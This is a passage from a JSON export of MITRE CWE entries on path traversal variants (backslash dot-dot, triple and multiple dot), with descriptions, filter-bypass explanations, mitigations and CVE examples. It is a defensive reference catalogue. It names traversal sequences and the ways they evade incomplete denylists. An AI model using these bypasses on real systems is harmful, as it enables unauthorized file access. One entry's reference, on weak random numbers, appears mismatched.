instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'..\\\\filename\' (\'dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Dot Dot Backslash - \'..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"29":{"attr":{"@_ID":"29","@_Name":"Path Traversal: \'\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-25, except using \\"\\\\\\" instead of \\"/\\". Sometimes a program checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check. It is also useful for bypassing path traversal protection schemes that only assume that the \\"/\\" separator is valid."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\..\\\\filename\' (\'leading dot dot backslash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Backslash - \'\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"30":{"attr":{"@_ID":"30","@_Name":"Path Traversal: \'\\\\dir\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'\\\\dir\\\\..\\\\filename\' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","This is similar to CWE-26, except using \\"\\\\\\" instead of \\"/\\". The \'\\\\dir\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"..\\\\\\" at the beginning of the input, so a \\"\\\\..\\\\\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"7 - \'\\\\directory\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Backslash - \'\\\\directory\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}}}},"31":{"attr":{"@_ID":"31","@_Name":"Path Traversal: \'dir\\\\..\\\\..\\\\filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'dir\\\\..\\\\..\\\\filename\' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'dir\\\\..\\\\..\\\\filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one \\"..\\\\\\" sequence, so multiple \\"..\\\\\\" can bypass that check. Alternately, this manipulation could be used to bypass a check for \\"..\\\\\\" at the beginning of the pathname, moving up more than one directory level."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"8 - \'directory\\\\..\\\\..\\\\filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"fixed incorrect manipulation in name (desc was correct)."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Directory Doubled Dot Dot Backslash - \'directory\\\\..\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'dir\\\\..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"32":{"attr":{"@_ID":"32","@_Name":"Path Traversal: \'...\' (Triple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'...\' (triple dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'...\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'...\' (triple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This manipulation-focused entry is currently hiding two distinct weaknesses, so it might need to be split. The manipulation is effective in two different contexts:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["it is equivalent to \\"..\\\\..\\" on Windows, or","it can take advantage of incomplete filtering, e.g. if the programmer does a single-pass removal of \\"./\\" in a string (collapse of data into unsafe value, CWE-182)."]}}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Triple Dot - \'...\'","attr":{"@_Date":"2008-04-11"}}}},"33":{"attr":{"@_ID":"33","@_Name":"Path Traversal: \'....\' (Multiple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....\' (multiple dot) sequences that can resolve to a location that is outside of that 